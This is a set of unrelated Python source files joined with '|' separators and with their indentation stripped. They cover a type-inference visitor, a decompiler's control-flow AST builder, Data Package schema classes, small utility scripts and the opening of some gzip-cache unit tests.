self.visit(FunctionNode(None, '__i' + msg + '__', ['self', 'other'], [], 0, None, Stmt([Return(CallFunc(Getattr(Name('self'), '__' + msg + '__'), [Name('other')], None, None))])), newclass)
# --- __str__, __hash__ # XXX model in lib/builtin.py, other defaults?
if not newclass.mv.module.builtin and not '__str__' in newclass.funcs:
self.visit(FunctionNode(None, '__str__', ['self'], [], 0, None, Return(CallFunc(Getattr(Name('self'), '__repr__'), []))), newclass)
newclass.funcs['__str__'].invisible = True
if not newclass.mv.module.builtin and not '__hash__' in newclass.funcs:
self.visit(FunctionNode(None, '__hash__', ['self'], [], 0, None, Return(Const(0)), []), newclass)
newclass.funcs['__hash__'].invisible = True
def visitGetattr(self, node, func=None, callfunc=False):
if node.attrname in ['__doc__']:
error('%s attribute is not supported' % node.attrname, self.gx, node, mv=getmv())
newnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[newnode] = set()
fakefunc = CallFunc(FakeGetattr(node.expr, '__getattr__'), [Const(node.attrname)])
self.visit(fakefunc, func)
self.add_constraint((self.gx.cnode[fakefunc, 0, 0], newnode), func)
self.callfuncs.append((fakefunc, func))
if not callfunc:
self.fncl_passing(node, newnode, func)
def visitConst(self, node, func=None):
if type(node.value) == unicode:
error('unicode is not supported', self.gx, node, mv=getmv())
map = {int: 'int_', str: 'str_', float: 'float_', type(None): 'none', long: 'int_', complex: 'complex'} # XXX 'return' -> Return(Const(None))?
self.instance(node, def_class(self.gx, map[type(node.value)]), func)
def fncl_passing(self, node, newnode, func):
lfunc, lclass = lookup_func(node, getmv()), lookup_class(node, getmv())
if lfunc:
if lfunc.mv.module.builtin:
lfunc = self.builtin_wrapper(node, func)
elif lfunc.ident not in lfunc.mv.lambdas:
lfunc.lambdanr = len(lfunc.mv.lambdas)
lfunc.mv.lambdas[lfunc.ident] = lfunc
self.gx.types[newnode] = set([(lfunc, 0)])
elif lclass:
if lclass.mv.module.builtin:
lclass = self.builtin_wrapper(node, func)
else:
lclass = lclass.parent
self.gx.types[newnode] = set([(lclass, 0)])
else:
return False
newnode.copymetoo = True # XXX merge into some kind of 'seeding' function
return True
def visitName(self, node, func=None):
newnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[newnode] = set()
if node.name == '__doc__':
error("'%s' attribute is not supported" % node.name, self.gx, node, mv=getmv())
if node.name in ['None', 'True', 'False']:
if node.name == 'None': # XXX also bools, remove def seed_nodes()
self.instance(node, def_class(self.gx, 'none'), func)
else:
self.instance(node, def_class(self.gx, 'bool_'), func)
return
if isinstance(func, Function) and node.name in func.globals:
var = default_var(self.gx, node.name, None, mv=getmv())
else:
var = lookup_var(node.name, func, mv=getmv())
if not var:
if self.fncl_passing(node, newnode, func):
pass
elif node.name in ['int', 'float', 'str']: # XXX
cl = self.ext_classes[node.name + '_']
self.gx.types[newnode] = set([(cl.parent, 0)])
newnode.copymetoo = True
else:
var = default_var(self.gx, node.name, None, mv=getmv())
if var:
self.add_constraint((inode(self.gx, var), newnode), func)
for a, b in self.gx.filterstack:
if var.name == a.name:
self.gx.filters[node] = lookup_class(b, getmv())
def builtin_wrapper(self, node, func):
node2 = CallFunc(copy.deepcopy(node), [Name(x) for x in 'abcde'])
l = Lambda(list('abcde'), [], 0, node2)
self.visit(l, func)
self.lwrapper[node] = self.lambdaname[l]
self.gx.lambdawrapper[node2] = self.lambdaname[l]
f = self.lambdas[self.lambdaname[l]]
f.lambdawrapper = True
inode(self.gx, node2).lambdawrapper = f
return f
def parse_module(name, gx, parent=None, node=None):
# --- valid name?
if not re.match("^[a-zA-Z0-9_.]+$", name):
print ("*ERROR*:%s.py: module names should consist of letters, digits and underscores" % name)
sys.exit(1)
# --- create module
try:
if parent and parent.path != os.getcwd():
basepaths = [parent.path, os.getcwd()]
else:
basepaths = [os.getcwd()]
module_paths = basepaths + gx.libdirs
absolute_name, filename, relative_filename, builtin = find_module(gx, name, module_paths)
module = Module(absolute_name, filename, relative_filename, builtin, node)
except ImportError:
error('cannot locate module: ' + name, gx, node, mv=getmv())
# --- check cache
if module.name in gx.modules: # cached?
return gx.modules[module.name]
gx.modules[module.name] = module
# --- not cached, so parse
module.ast = parse_file(module.filename)
old_mv = getmv()
module.mv = mv = ModuleVisitor(module, gx)
setmv(mv)
mv.visit = mv.dispatch
mv.visitor = mv
mv.dispatch(module.ast)
module.import_order = gx.import_order
gx.import_order += 1
mv = old_mv
setmv(mv)
return module
|
import sys
from time import time
from plasma.lib.ast import (Ast_Branch, Ast_Goto, Ast_Loop, Ast_If_cond,
Ast_IfGoto, Ast_Ifelse, Ast_AndIf, Ast_Comment)
from plasma.lib.utils import BRANCH_NEXT, BRANCH_NEXT_JUMP, debug__
from plasma.lib.exceptions import ExcIfelse
from plasma.lib.colors import pick_color
class Endpoint():
def __init__(self, ast, unseen, l_start):
self.ast = [ast]
self.unseen = unseen
self.loop_start = [l_start]
def rendezvous(self, ast, prev, l_start):
self.ast.append(ast)
self.loop_start.append(l_start)
if prev in self.unseen:
self.unseen.remove(prev)
def assign_colors(libarch, ctx, ast):
if isinstance(ast, Ast_Branch):
for n in ast.nodes:
if isinstance(n, list):
if libarch.utils.is_uncond_jump(n[0]) and \
n[0].operands[0].type == libarch.utils.OP_IMM and \
n[0].address in ctx.gph.link_out:
nxt = ctx.gph.link_out[n[0].address][BRANCH_NEXT]
pick_color(nxt)
else: # ast
assign_colors(libarch, ctx, n)
elif isinstance(ast, Ast_IfGoto) or isinstance(ast, Ast_Goto):
pick_color(ast.addr_jump)
elif isinstance(ast, Ast_Ifelse):
assign_colors(libarch, ctx, ast.br_next_jump)
assign_colors(libarch, ctx, ast.br_next)
elif isinstance(ast, Ast_Loop):
assign_colors(libarch, ctx, ast.branch)
def get_first_addr(ast):
# Assume that there are no Ast_Comment
if isinstance(ast, list):
return ast[0].address
if isinstance(ast, Ast_Branch):
if len(ast.nodes) > 0:
return get_first_addr(ast.nodes[0])
if isinstance(ast, Ast_Ifelse):
# Any instructions at the moment so we can use the jump inst
return ast.jump_inst.address
if isinstance(ast, Ast_Loop):
if len(ast.branch.nodes) > 0:
return get_first_addr(ast.branch.nodes[0])
if isinstance(ast, Ast_Goto):
return ast.addr_jump
if isinstance(ast, Ast_IfGoto):
return ast.orig_jump.address
if isinstance(ast, Ast_AndIf):
return ast.orig_jump.address
if isinstance(ast, Ast_If_cond):
if len(ast.br.nodes) > 0:
return get_first_addr(ast.br.nodes[0])
return -1
def get_next_addr(ast):
par = ast.parent
if par is None:
return -1
i = ast.idx_in_parent + 1
# Get the next address of the parent ast
if i == len(par.nodes):
return get_next_addr(par)
return get_first_addr(par.nodes[i])
def is_last_in_loop(ast, i):
par = ast.parent
if par is None:
return -1
is_last = i == len(ast.nodes) - 1
a = ast.parent.nodes[ast.idx_in_parent]
if isinstance(a, Ast_Loop) and is_last:
return get_first_addr(a)
if not is_last:
return -1
return is_last_in_loop(par, ast.idx_in_parent)
def remove_all_unnecessary_goto(ast):
if isinstance(ast, Ast_Branch):
# Remove all last Ast_Goto, only if the previous is not an andif
if len(ast.nodes) > 0 and isinstance(ast.nodes[-1], Ast_Goto):
if len(ast.nodes) <= 1 or not isinstance(ast.nodes[-2], Ast_AndIf):
if not ast.nodes[-1].dont_remove:
nxt = get_next_addr(ast)
if ast.nodes[-1].addr_jump == nxt:
del ast.nodes[-1]
for n in ast.nodes:
if not isinstance(n, list):
remove_all_unnecessary_goto(n)
elif isinstance(ast, Ast_Ifelse):
remove_all_unnecessary_goto(ast.br_next)
remove_all_unnecessary_goto(ast.br_next_jump)
elif isinstance(ast, Ast_Loop):
if isinstance(ast.branch.nodes[-1], Ast_Goto):
if get_first_addr(ast) == ast.branch.nodes[-1].addr_jump:
del ast.branch.nodes[-1]
remove_all_unnecessary_goto(ast.branch)
def fix_non_consecutives(ctx, ast):
if isinstance(ast, Ast_Branch):
idx_to_add = {}
for i, n in enumerate(ast.nodes):
if isinstance(n, list):
ad = n[0].address
if ad in ctx.gph.uncond_jumps_set or ad not in ctx.gph.link_out:
continue
nxt1 = ctx.gph.link_out[ad][BRANCH_NEXT]
if i == len(ast.nodes) - 1:
loop_start = is_last_in_loop(ast, i)
if loop_start != -1:
if nxt1 != loop_start:
idx_to_add[i + 1] = nxt1
continue
nxt2 = get_next_addr(ast)
else:
nxt2 = get_first_addr(ast.nodes[i + 1])
if nxt1 != nxt2:
idx_to_add[i + 1] = nxt1
else:
fix_non_consecutives(ctx, n)
if not idx_to_add:
return
# Add from the end of the nodes list
lst = list(idx_to_add.keys())
lst.sort()
for i in reversed(lst):
ast.nodes.insert(i, Ast_Goto(idx_to_add[i]))
elif isinstance(ast, Ast_Ifelse):
fix_non_consecutives(ctx, ast.br_next)
fix_non_consecutives(ctx, ast.br_next_jump)
elif isinstance(ast, Ast_Loop):
fix_non_consecutives(ctx, ast.branch)
def search_endpoint(ctx, ast, entry, l_set, l_prev_loop, l_start):
endp = __search_endpoint(ctx, ast, entry, l_set, l_prev_loop, l_start)
if endp == -1:
return -1
# Check if we found an endpoint in a subloop : for a "if" it's not possible
# that the end goes in a loop, so we return -1 if this is the case.
if l_prev_loop == -1:
l = ctx.gph.not_in_loop
else:
# l_set contains also subloops, here we just want the current loop
l = ctx.gph.loops_set[(l_prev_loop, l_start)]
if endp not in l:
return -1
return endp
def __push_empty_waiting(stack, waiting, done):
for ad in list(waiting):
if len(waiting[ad]) > 0:
continue
del waiting[ad]
done.add(ad)
stack.append((-1, ad))
def __search_endpoint(ctx, ast, entry, l_set, l_prev_loop, l_start):
waiting = {}
visited = set()
done = set()
stack = []
first_nxt = []
for n in ctx.gph.link_out[entry]:
stack.append((entry, n))
first_nxt.append(n)
while 1:
while stack:
prev, ad = stack.pop(-1)
# Don't go outside the current loop : we want to search
# an if-endpoint.
if l_prev_loop != -1 and ad not in l_set:
continue
# If "ad" is in last_node_loop we are sure that the path
# will loop. So don't keep it if it's a subloop.
if ad in ctx.gph.last_node_loop and \
(l_prev_loop, l_start) not in ctx.gph.last_node_loop[ad]:
continue
# If endpoint == loop : maybe the endpoint is at the end of the loop
# If we have multiple link in, and if it's not a new loop, wait
if ad not in done:
lkin = ctx.gph.link_in[ad]
if ad == l_start or len(lkin) > 1:
unseen = get_unseen_links_in(ad, l_set, l_prev_loop, l_start)
if len(unseen) > 1:
if ad in waiting:
if prev in waiting[ad]:
waiting[ad].remove(prev)
else:
unseen.remove(prev)
waiting[ad] = unseen
continue
if ad in visited:
continue
visited.add(ad)
if ad in ctx.gph.link_out:
for n in ctx.gph.link_out[ad]:
stack.append((ad, n))
if not waiting:
return -1
# Now the stack is empty, but there are still some waiting nodes.
__push_empty_waiting(stack, waiting, done)
# If the stack is still empty but if we have still some waiting
# nodes, search if paths are really possible. If not, delete
# a dependence.
if not stack and waiting:
for ad in set(waiting):
for i in set(waiting[ad]):
if not ctx.gph.path_exists(entry, i, l_start):
waiting[ad].remove(i)
__push_empty_waiting(stack, waiting, done)
# It means that there was still one node in waiting without
# remaining dependencies and it was moved in stack.
if len(stack) == 1 and not waiting:
endp = stack[0][1]
# Check to be sure, see tests/analyzer/ifexit.c
v = True
for n in first_nxt:
v &= ctx.gph.path_exists(n, endp, l_start)
if not v:
return -1
return endp
if not stack:
return -1
# the while 1 continue...
def get_unseen_links_in(ad, l_set, l_prev_loop, l_start):
unseen = set(ctx.gph.link_in[ad])
# Is it the beginning of a loop ?
# Remove internal links to the beginning of the loop
if (l_start, ad) in ctx.gph.loops_all:
sub_loop = ctx.gph.loops_all[(l_start, ad)]
for prev in ctx.gph.link_in[ad]:
if prev in sub_loop and prev in unseen:
unseen.remove(prev)
if l_set is None:
return unseen
# Remove external jumps which are outside the current loop
for prev in ctx.gph.link_in[ad]:
if prev not in l_set and prev in unseen:
unseen.remove(prev)
return unseen
def remove_unnecessary_goto(ast, ad):
if len(ast.nodes) > 1:
if isinstance(ast.nodes[-1], Ast_Goto) and \
ast.nodes[-1].addr_jump == ad:
ast.nodes.pop(-1)
def rm_waiting(ctx, waiting, ad):
# Get the ast which has the smallest level
min_level_idx = -1
list_ast = waiting[ad].ast
list_loop_start = waiting[ad].loop_start
for i, a in enumerate(list_ast):
if (list_loop_start[i], ad) in ctx.gph.false_loops:
continue
if min_level_idx == -1 or a.level < list_ast[min_level_idx].level:
min_level_idx = i
if min_level_idx == -1:
print("errorD: this is a bug, please report")
sys.exit(1)
ast = list_ast[min_level_idx]
# Add goto on each other ast
# If they are finally unuseful, they will be deleted with
# remove_unnecessary_goto or in remove_unnecessary_goto
for i, a in enumerate(list_ast):
if i == min_level_idx:
continue
if len(a.nodes) == 0:
a.add(Ast_Goto(ad))
continue
# The previous instruction has not `ad` as the next instruction
if isinstance(a.nodes[-1], list):
prev = a.nodes[-1][0].address
if prev in ctx.gph.uncond_jumps_set:
continue
if prev in ctx.gph.link_out:
n = ctx.gph.link_out[prev][BRANCH_NEXT]
if n != ad:
a.add(Ast_Goto(n))
continue
# The previous is a goto, skip it
if isinstance(a.nodes[-1], Ast_Goto):
continue
a.add(Ast_Goto(ad))
waiting[ad].ast.clear()
del waiting[ad]
return ast
def manage_endpoint(ctx, waiting, ast, prev, ad, l_set, l_prev_loop,
l_start, ad_is_visited):
if ad not in ctx.gph.link_in or len(ctx.gph.link_in[ad]) <= 1:
return ast
# If ad_is_visited is False it means this is a prevision for a future
# visit on this node. Here prev has no sense.
if not ad_is_visited:
if ad not in waiting:
unseen = get_unseen_links_in(ad, l_set, l_prev_loop, l_start)
waiting[ad] = Endpoint(ast, unseen, l_start)
return None
if ad in waiting:
waiting[ad].rendezvous(ast, prev, l_start)
if len(waiting[ad].unseen) != 0:
return None
ast = rm_waiting(ctx, waiting, ad)
return ast
unseen = get_unseen_links_in(ad, l_set, l_prev_loop, l_start)
if len(unseen) > 1:
unseen.remove(prev)
waiting[ad] = Endpoint(ast, unseen, l_start)
return None
return ast
def generate_ast(ctx__):
global ctx
ctx = ctx__
start = time()
ast = Ast_Branch()
ast.parent = None
stack = [(ast, [], -1, ctx.entry, -1)]
visited = set()
waiting = {}
ast_head = ast
fake_br = Ast_Branch()
fake_br.level = sys.maxsize
libarch = ctx.gctx.libarch
while stack or waiting:
if not stack and waiting:
if not ctx.gph.skipped_loops_analysis:
break
for ad in set(waiting):
waiting[ad].unseen.clear()
stack.append((fake_br, [], -1, ad, -1))
ast, loops_stack, prev, curr, else_addr = stack.pop(-1)
# Check if we enter in a false loop (see gotoinloop*)
if loops_stack:
_, _, l_start = loops_stack[-1]
else:
l_start = ctx.entry
blk = ctx.gph.nodes[curr]
# Exit the current loop
while loops_stack:
l_ast, l_prev_loop, l_start = loops_stack[-1]
l_set = ctx.gph.loops_all[(l_prev_loop, l_start)]
if curr not in l_set:
loops_stack.pop(-1)
ast = l_ast.parent
if curr not in ctx.gctx.db.reverse_symbols:
name = "break_0x%x" % curr
ctx.gctx.db.symbols[name] = curr
ctx.gctx.db.reverse_symbols[curr] = name
ctx.gctx.db.modified = True
else:
break
if not loops_stack:
l_prev_loop = -1
l_start = ctx.entry
l_set = None
level = ast.level
if curr not in visited:
# Check if we need to stop and wait on a node
a = manage_endpoint(ctx, waiting, ast, prev, curr, l_set,
l_prev_loop, l_start, True)
if a is None:
continue
ast = a
remove_unnecessary_goto(ast, curr)
# Check if we enter in a new loop
if (l_start, curr) in ctx.gph.loops_all:
if not ctx.gctx.is_interactive or curr in ctx.gctx.db.xrefs:
do = True
if curr in ctx.gctx.db.reverse_symbols:
if not ctx.gctx.db.reverse_symbols[curr].startswith("break_"):
do = False
if do:
name = "loop_0x%x" % curr
ctx.gctx.db.symbols[name] = curr
ctx.gctx.db.reverse_symbols[curr] = name
ctx.gctx.db.modified = True
level += 1
a = Ast_Loop()
a.level = level
a.parent = ast
a.idx_in_parent = len(ast.nodes)
a.branch.parent = ast
a.branch.level = level
a.branch.idx_in_parent = len(ast.nodes)
ast.add(a)
ast = a.branch
loops_stack.append((a, l_start, curr))
else_addr = -1
l_ast = a
l_set = ctx.gph.loops_all[(l_start, curr)]
l_prev_loop = l_start
l_start = curr
if (l_prev_loop, l_start) in ctx.gph.infinite_loop:
a.is_infinite = True
# Here curr may has changed
if curr in visited:
if curr == l_start:
continue
if len(ast.nodes) > 0:
if isinstance(ast.nodes[-1], list):
prev = ast.nodes[-1][0].address
if prev not in ctx.gph.uncond_jumps_set:
ast.add(Ast_Goto(curr))
else:
ast.add(Ast_Goto(curr))
continue
visited.add(curr)
# Return instruction
if curr not in ctx.gph.link_out:
if curr != ctx.entry and \
(not ctx.gctx.is_interactive or curr in ctx.gctx.db.xrefs):
do = True
if curr in ctx.gctx.db.reverse_symbols:
if not ctx.gctx.db.reverse_symbols[curr].startswith("break_"):
do = False
if do:
name = "ret_0x%x" % curr
ctx.gctx.db.symbols[name] = curr
ctx.gctx.db.reverse_symbols[curr] = name
ctx.gctx.db.modified = True
ast.add(blk)
continue
nxt = ctx.gph.link_out[curr]
if curr in ctx.gctx.dis.jmptables:
ast.add(blk)
for n in nxt:
stack.append((ast, loops_stack, curr, n, else_addr))
elif len(nxt) == 2:
# We are on a conditional jump
prefetch = blk[1] if len(blk) == 2 else None
if loops_stack:
goto_set = False
c1 = nxt[BRANCH_NEXT] not in l_set
c2 = nxt[BRANCH_NEXT_JUMP] not in l_set
if c1 and c2:
raise ExcIfelse(curr)
if c1:
exit_loop = nxt[BRANCH_NEXT]
nxt_node_in_loop = nxt[BRANCH_NEXT_JUMP]
cond_id = libarch.utils.invert_cond(blk[0])
goto_set = True
if c2:
exit_loop = nxt[BRANCH_NEXT_JUMP]
nxt_node_in_loop = nxt[BRANCH_NEXT]
cond_id = libarch.utils.get_cond(blk[0])
goto_set = True
# goto to exit a loop
if goto_set:
stack.append((ast.parent, list(loops_stack), curr,
exit_loop, else_addr))
stack.append((ast, list(loops_stack), curr,
nxt_node_in_loop, else_addr))
a = Ast_IfGoto(blk[0], cond_id, exit_loop, prefetch)
a.parent = ast
a.level = level
a.idx_in_parent = len(ast.nodes)
ast.add(a)
continue
# and-if
if ctx.gctx.print_andif:
if else_addr == nxt[BRANCH_NEXT_JUMP]:
cond_id = libarch.utils.invert_cond(blk[0])
a = Ast_AndIf(blk[0], cond_id, nxt[BRANCH_NEXT], prefetch)
a.parent = ast
a.idx_in_parent = len(ast.nodes)
ast.add(a)
ast.add(Ast_Goto(nxt[BRANCH_NEXT]))
# Add a fake branch: when the manage_endpoint function will
# choose a branch to continue an endpoint (it means that
# all branchs to this endpoint have been reached), it will
# never take the fake_br because the level is set to maxint.
# The fake_br will be invisible
stack.append((fake_br, list(loops_stack), curr,
nxt[BRANCH_NEXT_JUMP], else_addr))
stack.append((ast, list(loops_stack), curr,
nxt[BRANCH_NEXT], else_addr))
continue
# and-if
if else_addr == nxt[BRANCH_NEXT]:
cond_id = libarch.utils.get_cond(blk[0])
a = Ast_AndIf(blk[0], cond_id, nxt[BRANCH_NEXT_JUMP], prefetch)
a.parent = ast
a.idx_in_parent = len(ast.nodes)
ast.add(a)
ast.add(Ast_Goto(nxt[BRANCH_NEXT_JUMP]))
stack.append((fake_br, list(loops_stack), curr,
nxt[BRANCH_NEXT], else_addr))
stack.append((ast, list(loops_stack), curr,
nxt[BRANCH_NEXT_JUMP], else_addr))
continue
# if-else
endpoint = search_endpoint(ctx, ast, curr, l_set, l_prev_loop, l_start)
force_inv_if = False
if curr in ctx.gctx.db.inverted_cond:
nxt = list(reversed(nxt))
force_inv_if = True
ast_if = Ast_Branch()
ast_if.parent = ast
ast_if.level = level + 1
ast_if.idx_in_parent = len(ast.nodes)
ast_else = Ast_Branch()
ast_else.parent = ast
ast_else.level = level + 1
ast_else.idx_in_parent = len(ast.nodes)
else_addr = nxt[BRANCH_NEXT_JUMP]
if endpoint != -1:
if (l_start, endpoint) not in ctx.gph.false_loops:
# If we have already seen this address (for example the
# endpoint is the beginning of the current loop) we don't
# re-add in the waiting list.
if endpoint not in visited:
manage_endpoint(ctx, waiting, ast, -1, endpoint, l_set,
l_prev_loop, l_start, False)
else:
endpoint = -1
stack.append((ast_if, list(loops_stack), curr,
nxt[BRANCH_NEXT], else_addr))
if endpoint == -1:
# No endpoint, so it's not useful to have an else-branch
# -> the stack will continue on `ast`
a = Ast_Ifelse(blk[0], ast_else, ast_if, else_addr, prefetch, force_inv_if)
stack.append((ast, list(loops_stack), curr,
nxt[BRANCH_NEXT_JUMP], else_addr))
a.parent = ast
a.level = level + 1
a.idx_in_parent = len(ast.nodes)
ast.add(a)
ast.add(Ast_Goto(else_addr))
elif endpoint == else_addr:
# Branch ast_else will be empty
a = Ast_Ifelse(blk[0], ast_else, ast_if, endpoint, prefetch)
# put the current ast instead of the ast_else
# -> it's not possible to invert this condition in the visual
stack.append((ast, list(loops_stack), curr,
nxt[BRANCH_NEXT_JUMP], else_addr))
a.parent = ast
a.level = level + 1
a.idx_in_parent = len(ast.nodes)
ast.add(a)
ast.add(Ast_Goto(else_addr))
else:
a = Ast_Ifelse(blk[0], ast_else, ast_if, endpoint, prefetch, force_inv_if)
stack.append((ast_else, list(loops_stack), curr,
nxt[BRANCH_NEXT_JUMP], else_addr))
a.parent = ast
a.level = level + 1
a.idx_in_parent = len(ast.nodes)
ast.add(a)
ast.add(Ast_Goto(endpoint))
else:
ast.add(blk)
stack.append((ast, loops_stack, curr,
nxt[BRANCH_NEXT], else_addr))
ast = ast_head
remove_all_unnecessary_goto(ast)
fix_non_consecutives(ctx, ast)
elapsed = time()
elapsed = elapsed - start
debug__("Ast generated in %fs" % elapsed)
# Process ast
start = time()
for func in libarch.registered:
func(ctx, ast)
elapsed = time()
elapsed = elapsed - start
debug__("Functions for processing ast in %fs" % elapsed)
if ctx.gctx.color:
assign_colors(libarch, ctx, ast)
if waiting:
ast_head.nodes.insert(0, Ast_Comment(""))
ast_head.nodes.insert(0, Ast_Comment(""))
ast_head.nodes.insert(0,
Ast_Comment("WARNING: there is a bug, the output is incomplete !"))
ast_head.nodes.insert(0, Ast_Comment(""))
ast_head.nodes.insert(0, Ast_Comment(""))
return ast, False
return ast, True
|
import collections
class AsaList(object):
@classmethod
def flatten(cls, lst):
"""
Returns Generator of non-iterable values
"""
for x in lst:
if not isinstance(x, collections.Iterable):
yield x
else:
for x in AsaList.flatten(x):
yield x
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .util import Specification
from . import compat
class Field(Specification):
"""
Field object for adding fields to a resource schema.
Currently this is built around the Tabular Data Package.
"""
SPECIFICATION = {'name': compat.str,
'title': compat.str,
'type': compat.str,
'format': compat.str,
'constraints': dict}
REQUIRED = ('name',)
class Constraints(Specification):
"""
Constraints object which can be added to a field in a resource schema
in order to represent the constraints put on that particular field.
"""
SPECIFICATION = {'required': bool,
'minLength': int,
'maxLength': int,
'unique': bool,
'pattern': compat.str,
'minimum': None,
'maximum': None}
class Reference(Specification):
"""
Reference object which can be added to a ForeignKey object to represent
the reference to the other datapackage.
"""
SPECIFICATION = {'datapackage': compat.str,
'resource': compat.str,
'fields': (compat.str, list)}
REQUIRED = ('fields',)
def __setattr__(self, attribute, value):
if attribute == 'fields':
# We need to make sure all fields are represented with by their
# names if it is a list
if type(value) == list:
modified_value = []
for single_value in value:
if type(single_value) == compat.str:
modified_value.append(single_value)
elif isinstance(single_value, Field):
modified_value.append(single_value.name)
else:
raise TypeError(
'Field type ({0}) is not supported'.format(
type(single_value)))
value = modified_value
elif type(value) == compat.str:
# We don't need to do anything with a str
pass
elif isinstance(value, Field):
# Set the name from the field as the value
value = value.name
else:
raise TypeError("Type of field ({0}) is not supported".format(
type(value)))
super(Reference, self).__setattr__(attribute, value)
class ForeignKey(Specification):
"""
ForeignKey object which can be added to a resource schema object to
represent a foreign key in another data package.
"""
SPECIFICATION = {'fields': (compat.str, list),
'reference': Reference}
REQUIRED = ('fields', 'reference')
def __setattr__(self, attribute, value):
# If the attribute is 'reference' we need to check if there is a
# fields attribute and do some checks to see if they are inconsistent
# because they shouldn't be
if attribute == 'reference' and 'fields' in self:
fields = self['fields']
if type(fields) != type(value.fields):
raise TypeError(
'Reference fields must have the same type as fields')
if type(value.fields) == list:
if len(value.fields) != len(fields):
raise ValueError(
'Reference fields and fields are inconsistent')
if attribute == 'fields':
value_type = type(value)
# We only want to show the names of the fields so we add we need
# to go through a list and get out the names and use them as the
# value
if value_type == list:
modified_value = []
for single_value in value:
if type(single_value) == compat.str:
modified_value.append(single_value)
elif isinstance(single_value, Field):
modified_value.append(single_value.name)
else:
raise TypeError(
'Foreign key type ({0}) is not supported'.format(
type(single_value)))
value = modified_value
elif value_type == compat.str:
# We don't need to do anything if the value is a str
pass
elif isinstance(value, Field):
value = value.name
else:
raise TypeError("Type of field ({0}) is not supported".format(
value_type))
# Same check as before about inconsistencies but just the other
# way around
if 'reference' in self:
reference_fields = self['reference'].fields
if type(reference_fields) != value_type:
raise TypeError(
'Fields must have the same type as Reference fields')
if type(reference_fields) == list:
if len(reference_fields) != len(value):
raise ValueError(
'Reference fields and fields are inconsistent')
super(ForeignKey, self).__setattr__(attribute, value)
class Schema(Specification):
"""
Schema object which holds the representation of the schema for a
Tabular Data Package (using the JSON Table Schema protocol). The
schema can be used just like a dictionary which means it is ready
for json serialization and export as part of a data package
descriptor (when added to a resource).
"""
SPECIFICATION = {'fields': list,
'primaryKey': (compat.str, list),
'foreignKeys': list}
def __init__(self, *args, **kwargs):
# We need to initialize an empty fields array (this is a required
# field but we don't require it, we create it)
self['fields'] = []
# We add the fields using the internal method so we can do
# validation of each field
self.add_fields(kwargs.pop('fields', []))
super(Schema, self).__init__(self, *args, **kwargs)
def __setattr__(self, attribute, value):
if attribute == 'primaryKey' and value is not None:
# Primary Keys must be a reference to existing fields so we
# need to check if the primary key is in the fields array
field_names = [f.name for f in self.get('fields', [])]
if type(value) == list:
modified_value = []
for single_value in value:
if type(single_value) == compat.str:
if single_value in field_names:
modified_value.append(single_value)
else:
raise AttributeError(
"Unknown '{0}' cannot be primaryKey".format(
single_value))
elif isinstance(single_value, Field):
if single_value.name in field_names:
modified_value.append(single_value.name)
else:
raise AttributeError(
"Unknown '{0}' cannot be primaryKey".format(
single_value.name))
else:
raise TypeError(
'primaryKey type ({0}) is not supported'.format(
type(single_value)))
value = modified_value
elif type(value) == compat.str:
if value not in field_names:
raise AttributeError(
"Unknown '{0}' cannot be primaryKey".format(
value))
elif isinstance(value, Field):
if value.name in field_names:
value = value.name
else:
raise AttributeError(
"Unknown '{0}' cannot be primaryKey".format(
value.name))
else:
raise TypeError('Primary Key type ({0}) not supported'.format(
type(value)))
super(Schema, self).__setattr__(attribute, value)
def add_field(self, field):
"""
Adds a field to the resource schema
:param ~Field field: A Field instance containing the field to be
appended to the schema.
"""
if isinstance(field, Field):
self['fields'].append(field)
elif type(field) == dict:
self['fields'].append(Field(field))
else:
raise TypeError("Type of parameter field is not supported.")
def add_fields(self, fields):
"""
Adds fields to the resource schema
:param list fields: A list of Field instances which should be
appended (extend) to the resource schema fields.
"""
# We loop through the fields list to make sure all elements
# in the list are of the proper type
for field in fields:
self.add_field(field)
def add_foreign_key(self, foreign_key):
"""
Adds a foreign key to the resource schema.
:param ~ForeignKey foreign_key: A ForeignKey object which keeps
track of a foreign key relationship to another data package.
"""
# We can only accept ForeignKey objects
if not isinstance(foreign_key, ForeignKey):
raise TypeError("Foreign Key type is not supported")
# ForeignKey fields must be a schema field
field_names = [f.name for f in self.get('fields', [])]
for field in foreign_key.fields:
if field not in field_names:
raise ValueError(
"Foreign key field '{0}' is not in schema fields".format(
field))
# Append the ForeignKey to the foreignKeys object or create it if it
# doesn't exist
foreign_keys = dict.get(self, 'foreignKeys', [])
foreign_keys.append(foreign_key)
self['foreignKeys'] = foreign_keys
def add_foreign_keys(self, foreign_keys):
"""
Adds foreign keys to the resource schema
:param list foreign_keys: A list of ForeignKey instances which should
be appended (extend) to the resource schema fields or create a
foreignKeys attribute if it doesn't exist.
"""
# We loop through the foreign keys list to make sure all elements
# in the list are of the proper type and validate
for foreign_key in foreign_keys:
self.add_foreign_key(foreign_key)
|
__author__ = 'Sun'
from sandbox.dynamic_title.creator.char_corpus import CharacterCorpus
import cPickle
import click
@click.command()
@click.argument("text_file", type=click.File(mode='r', encoding='gb18030'))
@click.argument("char_cropus_file", type=click.File(mode='wb'))
def make_char_corpus(text_file, char_cropus_file):
corpus = CharacterCorpus()
corpus.build(text_file)
cPickle.dump(corpus, char_cropus_file, protocol=cPickle.HIGHEST_PROTOCOL)
if __name__ == "__main__":
make_char_corpus()
|
def replace_0_5_iterative(user_input):
modified = []
for i in user_input:
if i == "0":
modified.append("5")
else:
modified.append(i)
return "".join(modified)
def replace_0_5_pythonic(user_input):
return user_input.replace("0", "5")
user_input = input("Enter the number: ")
print("\n----- Iterative Approach -----")
new_str = replace_0_5_iterative(user_input)
print("Modified number: " + new_str)
print("\n----- Python Replace Approach -----")
new_str = replace_0_5_pythonic(user_input)
print("Modified number: " + new_str)
|
'''Core plugins unit tests'''
import os
import tempfile
import unittest
import time
from contextlib import contextmanager
from tempfile import mkdtemp
from shutil import rmtree
from hashlib import md5
import gzip_cache
@contextmanager
def temporary_folder():
"""creates a temporary folder, return it and delete it afterwards.
This allows to do something like this in tests:
>>> with temporary_folder() as d:
# do whatever you want
"""
tempdir = mkdtemp()
try:
yield tempdir
finally:
rmtree(tempdir)
class TestGzipCache(unittest.TestCase):
def test_should_compress(self):
user_exclude_types = ()
# Some filetypes should compress and others shouldn't.
self.assertTrue(gzip_cache.should_compress('foo.html', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('bar.css', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('baz.js', user_exclude_types))
